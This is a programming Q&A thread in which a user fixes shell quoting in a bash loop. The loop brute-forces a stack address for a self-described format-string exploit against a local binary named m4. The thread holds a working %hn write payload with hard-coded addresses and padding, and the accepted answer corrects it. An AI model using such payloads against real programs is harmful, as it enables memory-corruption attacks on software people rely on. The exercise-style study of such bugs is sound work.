# shell scripting hexadecimal counter

Tags: python, shell, format-string

I'm having some problem with my shell script:

I want to run my program m4 with different kind of string, I wrote down this script:

```
#!/bin/bash

for number in $( seq 16 253 )
  do
    num=$((number+2))
    hex_base=$( printf "%X" ${number} )
    hex_offset=$( printf "%X" ${num} )
    ./m4 "`python -c 'print "\x66\x66\x${hex_offset}\xed\xff\xbf\x${hex_base}\xed\xff\xbf%49135c%88$hn%14153c%89$hn"'`"
done
```

It counts from 10 to FD in hexadecimal and put this values in my string.
This error appears:

`ValueError: invalid \x escape`

**First question**: is this a real error or just a warning?
**Second question**: why if all the value are made of two characters in the address you should see in the string, the error however appears?

Comment: Why do you need the shell here? Things would be much easier, if you would use python and call m4 with subprocess.

Comment: it is a format-string exploit script, where I don't know the address where i want to write.

Answer (score 0, accepted):

Should work when you take the `hex_base` out of single quotes:

```
./m4 "`python -c 'print "\x66\x66\x'${hex_offset}'\xed\xff\xbf\x'${hex_base}'\xed\xff\xbf%49135c%88$hn%14153c%89$hn"'`"
```

Comment: thanks so much! how can I have the index value (number) printed before the output of my program?

Comment: what do you mean before? something like: `print "'$number'\x66\x66..`?

Comment: something like: 10 : output. 11 : output. 12 : output

Comment: maybe could I redirect the output to a file?

Comment: sorry I can't follow your question. But perhaps just doing an `echo $number` before the python line is sufficient?

Comment: ... and it was exactly that, sorry but it was m first script